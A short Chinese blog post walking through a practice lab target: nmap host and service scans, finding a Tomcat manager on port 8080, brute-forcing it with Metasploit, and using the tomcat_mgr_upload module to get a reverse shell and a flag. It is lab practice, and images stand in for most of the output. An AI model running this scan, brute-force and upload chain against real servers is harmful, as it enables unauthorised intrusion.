您的位置: 首页 > IT文章 > 某测试靶机练手某一次小练习

某测试靶机练手某一次小练习

分类: IT文章 • 2023-12-01 10:48:13

1.存活主机

nmap -sn 192.197.55.0/24

某测试靶机练手
某一次小练习

某测试靶机练手
某一次小练习

根据提示我们可以查看

nmap -sV 192.197.55.3

某测试靶机练手
某一次小练习

可以看到8080端口开放

浏览器访问

某测试靶机练手
某一次小练习

单纯图片

扫描目录

某测试靶机练手
某一次小练习
访问manager

某测试靶机练手
某一次小练习

2.利用msf爆破·

某测试靶机练手
某一次小练习

3.Tomcat Manager经过身份验证的上载代码执行

use exploit/multi/http/tomcat_mgr_upload

某测试靶机练手
某一次小练习

成功反弹到shell

flag1

某测试靶机练手
某一次小练习